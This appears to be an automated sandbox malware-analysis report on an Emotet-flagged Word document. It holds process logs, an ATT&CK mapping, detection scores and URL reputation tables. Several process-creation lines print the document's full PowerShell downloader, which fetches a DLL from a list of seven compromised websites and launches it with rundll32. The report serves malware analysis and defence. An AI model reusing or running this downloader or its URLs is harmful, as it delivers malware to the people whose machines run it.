Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1268Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_000007FF00270F3C sldt word ptr [eax]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000004.00000002.426548508.000000000031E000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand and Scripting Interpreter111Path InterceptionProcess Injection11Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScripting12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution1Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsPowerShell1Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery11SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonScripting12Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
1711.doc40%VirustotalBrowse
1711.doc20%MetadefenderBrowse
1711.doc58%ReversingLabsDocument-Word.Trojan.Emotet

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://yougandan.com/backup0%Avira URL Cloudsafe
http://alfadandoinc.com/67oyp/C2h0%Avira URL Cloudsafe
http://itomsystem.in/i9eg3y/nNxmmn9aTcv/P100%Avira URL Cloudmalware
http://thepilatesstudionj.com/wp-content/oAx5UoQm0%Avira URL Cloudsafe
http://itomsystem.in/i9eg3y/nN0%Avira URL Cloudsafe
http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/100%Avira URL Cloudmalware
http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/100%Avira URL Cloudmalware
http://www.caboturnup.c0%Avira URL Cloudsafe
https://staviancjs.com/wp-forum/QOm4n2/100%Avira URL Cloudmalware
http://www.%s.comPA0%URL Reputationsafe
https://staviancjs.com/wp-forum/QOm40%Avira URL Cloudsafe
http://itomsystem.in/i9eg3y/nNxmmn9aTcv/100%Avira URL Cloudmalware
http://alfadandoinc.com/67oyp/C2J2KyCpQn0%Avira URL Cloudsafe
http://itomsystem.in/i9eg3y/nNxmmn9aTcv/PE100%Avira URL Cloudmalware
http://thepilatesstudionj.com/wp0%Avira URL Cloudsafe
http://www.caboturnup.com/wp-content/p0%Avira URL Cloudsafe
https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNc0%Avira URL Cloudsafe
http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZg0%Avira URL Cloudsafe
https://staviancjs.co0%Avira URL Cloudsafe
https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/0%Avira URL Cloudsafe
http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/100%Avira URL Cloudmalware
http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://yougandan.com/backuppowershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmptrue
  • Avira URL Cloud: safe
unknown
http://alfadandoinc.com/67oyp/C2hpowershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://itomsystem.in/i9eg3y/nNxmmn9aTcv/Ppowershell.exe, 00000004.00000002.427629821.0000000002E7C000.00000004.00000001.sdmptrue
  • Avira URL Cloud: malware
unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000004.00000002.426788462.0000000002230000.00000002.00020000.sdmpfalse
    		high
    http://thepilatesstudionj.com/wp-content/oAx5UoQmpowershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    http://itomsystem.in/i9eg3y/nNpowershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmptrue
    • Avira URL Cloud: malware
    		unknown
    http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmptrue
    • Avira URL Cloud: malware
    		unknown
    http://www.caboturnup.cpowershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    https://staviancjs.com/wp-forum/QOm4n2/powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmptrue
    • Avira URL Cloud: malware
    		unknown
    http://www.%s.comPApowershell.exe, 00000004.00000002.426788462.0000000002230000.00000002.00020000.sdmpfalse
    • URL Reputation: safe
    		low
    https://staviancjs.com/wp-forum/QOm4powershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    http://itomsystem.in/i9eg3y/nNxmmn9aTcv/powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmptrue
    • Avira URL Cloud: malware
    		unknown
    http://alfadandoinc.com/67oyp/C2J2KyCpQnpowershell.exe, 00000004.00000002.430534978.0000000003AB5000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    http://itomsystem.in/i9eg3y/nNxmmn9aTcv/PEpowershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmptrue
    • Avira URL Cloud: malware
    		unknown
    http://thepilatesstudionj.com/wppowershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    http://www.caboturnup.com/wp-content/ppowershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcpowershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgpowershell.exe, 00000004.00000002.427876322.000000000311C000.00000004.00000001.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    https://staviancjs.copowershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmptrue
    • Avira URL Cloud: malware
    		unknown
    http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmptrue
    • Avira URL Cloud: safe
    		unknown

    Contacted IPs

    No contacted IP infos

    General Information

    Joe Sandbox Version:34.0.0 Boulder Opal
    Analysis ID:526179
    Start date:22.11.2021
    Start time:10:54:26
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 5m 0s
    Hypervisor based Inspection enabled:false
    Report type:light
    Sample file name:1711.doc
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:6
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • GSI enabled (VBA)
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal84.expl.winDOC@5/13@0/0
    EGA Information:Failed
    HDC Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .doc
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    Warnings:
    Show All
    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
    • Execution Graph export aborted for target powershell.exe, PID 2840 because it is empty
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtQueryAttributesFile calls found.
    • Report size getting too big, too many NtSetInformationFile calls found.

    Simulations

    Behavior and APIs

    TimeTypeDescription
    10:54:22API Interceptor55x Sleep call for process: powershell.exe modified

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    No context

    ASN

    No context

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4114E8B1.png
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:PNG image data, 1127 x 490, 8-bit/color RGB, non-interlaced
    Category:dropped
    Size (bytes):121507
    Entropy (8bit):7.978393301250379
    Encrypted:false
    SSDEEP:3072:oXwhJd0+y7ukYe4uYum1GdgOpVXGuhCUqc:oXw50+OukzVXV2uhDj
    MD5:D3C11BC087FAF4372F4C5D37E06FCFFD
    SHA1:40A9FE4D47DADFDB1463D63F14D6D60641AC19E5
    SHA-256:6F49F13CEF0667A75A3E55767CD769F476EB3FF400BDA8CB3FBF47BA8B0A7077
    SHA-512:C50363E3CA99B4537A8BA625D84CD0A8C2E8FB15D1FF0163E967D3536E373F3449EB4489EC117766D78B1386D60192453FAE8C372119E32D98E58B07844216EB
    Malicious:false
